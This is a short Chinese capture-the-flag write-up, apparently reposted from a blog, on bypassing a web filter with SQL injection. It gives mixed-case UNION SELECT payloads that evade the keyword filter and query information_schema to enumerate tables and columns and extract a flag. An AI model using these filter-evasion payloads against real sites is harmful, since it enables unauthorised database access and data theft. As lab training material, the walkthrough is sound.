安恒杯-绕过看门狗

时间：2017-12-26 21:02:33 阅读：215 评论：0 收藏：0 [点我收藏+]

1. 输入and 1=1发现非法提示

技术分享图片

通过大小写混淆可以绕过

技术分享图片

2. 经测试，发现有5个字段

技术分享图片

3. 查数据库和当前用户

技术分享图片

4. 查表

UniOn SelEct 1,(SelEct Table_Name fROm InfOrMation_sChema.tAbles WhEre tAble_sChema=‘news‘ lImit 1,1),3,4,5#

技术分享图片

5. 查表中字段

UniOn Select 1,(SelecT ColuMn_Name FrOm InFOrMation_sChema.COluMns WherE TaBle_NaMe=‘tb_flag‘ liMit 0,1),3,4,5#

技术分享图片

5. 查内容

UniOn Select 1,(SelecT flag FrOm news.tb_flag),3,4,5#

技术分享图片

原文地址：https://www.cnblogs.com/hell0w/p/8119659.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

周排行